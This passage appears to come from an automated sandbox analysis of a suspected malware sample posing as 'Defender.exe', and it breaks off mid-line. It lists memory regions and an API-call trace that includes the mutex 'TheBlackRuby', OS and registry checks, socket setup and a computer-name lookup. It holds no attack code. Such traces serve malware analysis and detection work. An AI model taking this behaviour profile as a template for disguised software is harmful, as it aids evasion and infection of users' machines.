name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 279 start_va = 0x754e0000 end_va = 0x754ebfff entry_point = 0x754e0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 280 start_va = 0x75650000 end_va = 0x7576cfff entry_point = 0x75650000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 281 start_va = 0xd30000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 282 start_va = 0x75070000 end_va = 0x75086fff entry_point = 0x75070000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 283 start_va = 0x6d60000 end_va = 0x6fbffff entry_point = 0x0 region_type = private name = "private_0x0000000006d60000" filename = "" Region: id = 284 start_va = 0x74310000 end_va = 0x74404fff entry_point = 0x74310000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 285 start_va = 0x75bf0000 end_va = 0x75c7efff entry_point = 0x75bf0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 286 start_va = 0x600000 end_va = 0x601fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 287 start_va = 0x74450000 end_va = 0x745edfff entry_point = 0x74450000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 288 start_va = 0x610000 end_va = 0x610fff entry_point = 0x610000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 289 start_va = 0x620000 end_va = 0x621fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 290 start_va = 0x714e0000 end_va = 0x7152bfff entry_point = 0x714e0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 291 start_va = 0x610000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 292 start_va = 0x770b0000 end_va = 0x77132fff entry_point = 0x770b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 293 start_va = 0x630000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 294 start_va = 0x72060000 end_va = 0x72adffff entry_point = 0x72060000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 295 start_va = 0x774e0000 end_va = 0x774e4fff entry_point = 0x774e0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 296 start_va = 0x72020000 end_va = 0x7205bfff entry_point = 0x72020000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 297 start_va = 0x75d30000 end_va = 0x75f2afff entry_point = 0x75d30000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 298 start_va = 0x640000 end_va = 0x640fff entry_point = 0x640000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 299 start_va = 0x650000 end_va = 0x651fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 300 start_va = 0x75ab0000 end_va = 0x75be5fff entry_point = 0x75ab0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 301 start_va = 0x77140000 end_va = 0x77234fff entry_point = 0x77140000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 302 start_va = 0x75550000 end_va = 0x75561fff entry_point = 0x75550000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 303 start_va = 0x75910000 end_va = 0x75aacfff entry_point = 0x75910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 304 start_va = 0x73af0000 end_va = 0x73b10fff entry_point = 0x73af0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 305 start_va = 0x75840000 end_va = 0x75884fff entry_point = 0x75840000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 306 start_va = 0x660000 end_va = 0x663fff entry_point = 0x660000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 307 start_va = 0x670000 end_va = 0x68efff entry_point = 0x670000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 308 start_va = 0x690000 end_va = 0x690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 309 start_va = 0x4a30000 end_va = 0x4b30fff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 310 start_va = 0x4bb0000 end_va = 0x4beffff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 311 start_va = 0x4a30000 end_va = 0x4b30fff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 312 start_va = 0x4a30000 end_va = 0x4b30fff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 313 start_va = 0x660000 end_va = 0x663fff entry_point = 0x660000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 314 start_va = 0x3c60000 end_va = 0x3c8ffff entry_point = 0x3c60000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 315 start_va = 0xd40000 end_va = 0xd43fff entry_point = 0xd40000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 316 start_va = 0x3d00000 end_va = 0x3d65fff entry_point = 0x3d00000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 317 start_va = 0xd50000 end_va = 0xd50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 356 start_va = 0x3b40000 end_va = 0x3b40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b40000" filename = "" Region: id = 357 start_va = 0x4a70000 end_va = 0x4b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 358 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Thread: id = 1 os_tid = 0x9e4 [0026.491] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0027.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18e9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0027.080] GetLastError () returned 0x2 [0027.083] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0027.083] GetLastError () returned 0x2 [0027.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\", nBufferLength=0x105, lpBuffer=0x18e904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\", lpFilePart=0x0) returned 0x19 [0027.096] GetLastError () returned 0x2 [0027.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\", nBufferLength=0x105, lpBuffer=0x18e9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\", lpFilePart=0x0) returned 0x19 [0027.099] GetLastError () returned 0x2 [0027.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\", nBufferLength=0x105, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\", lpFilePart=0x0) returned 0x19 [0027.099] GetLastError () returned 0x2 [0027.106] GetVersionExW (in: lpVersionInformation=0x351c98*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x351c98*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0027.106] GetLastError () returned 0x2 [0027.106] GetVersionExW (in: lpVersionInformation=0x351c98*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x351c98*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0027.106] GetLastError () returned 0x2 [0027.338] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="TheBlackRuby") returned 0x170 [0027.338] GetLastError () returned 0x0 [0027.572] GetACP () returned 0x4e4 [0027.752] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", nBufferLength=0x105, lpBuffer=0x18e940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", lpFilePart=0x0) returned 0x28 [0027.752] GetLastError () returned 0x0 [0027.752] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", lpFilePart=0x0) returned 0x28 [0027.752] GetLastError () returned 0x0 [0027.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0027.756] GetLastError () returned 0x0 [0027.873] GetVersionExW (in: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0027.873] GetLastError () returned 0x0 [0027.874] GetCurrentProcess () returned 0xffffffff [0027.874] GetLastError () returned 0x3f0 [0027.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea8c | out: TokenHandle=0x18ea8c*=0x184) returned 1 [0027.876] GetLastError () returned 0x3f0 [0027.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x18e624, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0027.879] GetLastError () returned 0x0 [0027.904] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18eacc | out: lpFileInformation=0x18eacc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x9542db70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1 [0027.904] GetLastError () returned 0x0 [0027.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0027.905] GetLastError () returned 0x0 [0027.906] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18eac8 | out: lpFileInformation=0x18eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x9542db70, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1 [0027.906] GetLastError () returned 0x0 [0027.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0027.907] GetLastError () returned 0x0 [0027.908] SetErrorMode (uMode=0x1) returned 0x0 [0027.909] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x198 [0027.909] GetLastError () returned 0x0 [0027.910] GetFileType (hFile=0x198) returned 0x1 [0027.910] SetErrorMode (uMode=0x0) returned 0x1 [0027.910] GetFileType (hFile=0x198) returned 0x1 [0027.926] GetFileSize (in: hFile=0x198, lpFileSizeHigh=0x18ea9c | out: lpFileSizeHigh=0x18ea9c*=0x0) returned 0x622a [0027.926] GetLastError () returned 0x0 [0027.927] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ea54, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18ea54*=0x1000, lpOverlapped=0x0) returned 1 [0027.927] GetLastError () returned 0x0 [0027.940] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e70c, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e70c*=0x1000, lpOverlapped=0x0) returned 1 [0027.940] GetLastError () returned 0x0 [0027.941] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e70c, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e70c*=0x1000, lpOverlapped=0x0) returned 1 [0027.941] GetLastError () returned 0x0 [0027.942] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e70c, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e70c*=0x1000, lpOverlapped=0x0) returned 1 [0027.942] GetLastError () returned 0x0 [0027.942] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e70c, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e70c*=0x1000, lpOverlapped=0x0) returned 1 [0027.942] GetLastError () returned 0x0 [0027.947] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e840, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e840*=0x1000, lpOverlapped=0x0) returned 1 [0027.947] GetLastError () returned 0x0 [0027.947] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e740, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e740*=0x22a, lpOverlapped=0x0) returned 1 [0027.947] GetLastError () returned 0x0 [0027.948] ReadFile (in: hFile=0x198, lpBuffer=0x1ae75f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e78c, lpOverlapped=0x0 | out: lpBuffer=0x1ae75f8*, lpNumberOfBytesRead=0x18e78c*=0x0, lpOverlapped=0x0) returned 1 [0027.948] GetLastError () returned 0x0 [0027.948] CloseHandle (hObject=0x198) returned 1 [0027.948] GetLastError () returned 0x0 [0027.950] GetCurrentProcess () returned 0xffffffff [0027.950] GetLastError () returned 0x3f0 [0027.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed1c | out: TokenHandle=0x18ed1c*=0x198) returned 1 [0027.951] GetLastError () returned 0x3f0 [0027.951] GetCurrentProcess () returned 0xffffffff [0027.951] GetLastError () returned 0x3f0 [0027.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed1c | out: TokenHandle=0x18ed1c*=0x19c) returned 1 [0027.951] GetLastError () returned 0x3f0 [0027.952] GetCurrentProcess () returned 0xffffffff [0027.952] GetLastError () returned 0x3f0 [0027.952] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea8c | out: TokenHandle=0x18ea8c*=0x1a0) returned 1 [0027.952] GetLastError () returned 0x3f0 [0027.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config" (normalized: "c:\\users\\eebsym5\\desktop\\defender.config"), fInfoLevelId=0x0, lpFileInformation=0x18eacc | out: lpFileInformation=0x18eacc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0027.953] GetLastError () returned 0x2 [0027.953] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.config", lpFilePart=0x0) returned 0x28 [0027.953] GetLastError () returned 0x2 [0027.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.config" (normalized: "c:\\users\\eebsym5\\desktop\\defender.config"), fInfoLevelId=0x0, lpFileInformation=0x18eac8 | out: lpFileInformation=0x18eac8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0027.953] GetLastError () returned 0x2 [0027.953] GetCurrentProcess () returned 0xffffffff [0027.953] GetLastError () returned 0x3f0 [0027.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed1c | out: TokenHandle=0x18ed1c*=0x1a4) returned 1 [0027.953] GetLastError () returned 0x3f0 [0027.953] GetCurrentProcess () returned 0xffffffff [0027.953] GetLastError () returned 0x3f0 [0027.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ed1c | out: TokenHandle=0x18ed1c*=0x1a8) returned 1 [0027.954] GetLastError () returned 0x3f0 [0027.991] lstrlenW (lpString="䅁") returned 1 [0027.993] GetCurrentProcess () returned 0xffffffff [0027.993] GetLastError () returned 0x3f0 [0027.993] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eaf8 | out: TokenHandle=0x18eaf8*=0x1ac) returned 1 [0027.993] GetLastError () returned 0x3f0 [0028.016] GetCurrentProcess () returned 0xffffffff [0028.016] GetLastError () returned 0x3f0 [0028.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eb08 | out: TokenHandle=0x18eb08*=0x1b0) returned 1 [0028.016] GetLastError () returned 0x3f0 [0028.040] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1b4 [0028.040] GetLastError () returned 0x0 [0028.040] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1b8 [0028.040] GetLastError () returned 0x0 [0028.053] GetCurrentProcess () returned 0xffffffff [0028.053] GetLastError () returned 0x3f0 [0028.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eaec | out: TokenHandle=0x18eaec*=0x1bc) returned 1 [0028.053] GetLastError () returned 0x3f0 [0028.056] GetCurrentProcess () returned 0xffffffff [0028.056] GetLastError () returned 0x3f0 [0028.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eafc | out: TokenHandle=0x18eafc*=0x1c0) returned 1 [0028.056] GetLastError () returned 0x3f0 [0028.062] GetCurrentProcess () returned 0xffffffff [0028.062] GetLastError () returned 0x3f0 [0028.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eac0 | out: TokenHandle=0x18eac0*=0x1c4) returned 1 [0028.062] GetLastError () returned 0x3f0 [0028.064] GetCurrentProcess () returned 0xffffffff [0028.064] GetLastError () returned 0x3f0 [0028.064] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ead0 | out: TokenHandle=0x18ead0*=0x1c8) returned 1 [0028.064] GetLastError () returned 0x3f0 [0028.067] GetCurrentProcess () returned 0xffffffff [0028.067] GetLastError () returned 0x3f0 [0028.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18edc4 | out: TokenHandle=0x18edc4*=0x1cc) returned 1 [0028.067] GetLastError () returned 0x3f0 [0028.116] lstrlenW (lpString="䅁") returned 1 [0028.117] GetVersionExW (in: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0028.117] GetLastError () returned 0x3f0 [0028.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x18de24 | out: phkResult=0x18de24*=0x1d0) returned 0x0 [0028.122] RegQueryValueExW (in: hKey=0x1d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18de6c, lpData=0x0, lpcbData=0x18de68*=0x0 | out: lpType=0x18de6c*=0x1, lpData=0x0, lpcbData=0x18de68*=0xe) returned 0x0 [0028.124] RegQueryValueExW (in: hKey=0x1d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18de6c, lpData=0x3521e8, lpcbData=0x18de68*=0xe | out: lpType=0x18de6c*=0x1, lpData="Client", lpcbData=0x18de68*=0xe) returned 0x0 [0028.125] RegCloseKey (hKey=0x1d0) returned 0x0 [0028.154] RasEnumConnectionsW (in: param_1=0x364560, param_2=0x18ee3c, param_3=0x18ee40 | out: param_1=0x364560, param_2=0x18ee3c, param_3=0x18ee40) returned 0x0 [0028.249] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x364560 | out: lpWSAData=0x364560) returned 0 [0028.255] GetLastError () returned 0x0 [0028.260] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x24c [0028.370] GetLastError () returned 0x0 [0028.370] setsockopt (s=0x24c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0028.371] GetLastError () returned 0x273a [0028.371] closesocket (s=0x24c) returned 0 [0028.371] GetLastError () returned 0x0 [0028.371] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x24c [0028.384] GetLastError () returned 0x0 [0028.384] setsockopt (s=0x24c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0028.384] GetLastError () returned 0x273a [0028.384] closesocket (s=0x24c) returned 0 [0028.384] GetLastError () returned 0x0 [0028.387] GetCurrentProcess () returned 0xffffffff [0028.387] GetLastError () returned 0x3f0 [0028.387] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e9a8 | out: TokenHandle=0x18e9a8*=0x24c) returned 1 [0028.387] GetLastError () returned 0x3f0 [0028.391] GetCurrentProcess () returned 0xffffffff [0028.391] GetLastError () returned 0x3f0 [0028.391] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e9b8 | out: TokenHandle=0x18e9b8*=0x250) returned 1 [0028.391] GetLastError () returned 0x3f0 [0028.419] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", nBufferLength=0x105, lpBuffer=0x18e7b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Defender.exe", lpFilePart=0x0) returned 0x25 [0028.420] GetLastError () returned 0x3f0 [0028.423] GetCurrentProcessId () returned 0x9e0 [0028.427] GetComputerNameW (in: lpBuffer=0x364560, nSize=0x1b0a190 | out: lpBuffer="CRH2YWU7", nSize=0x1b0a190) returned 1 [0028.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR 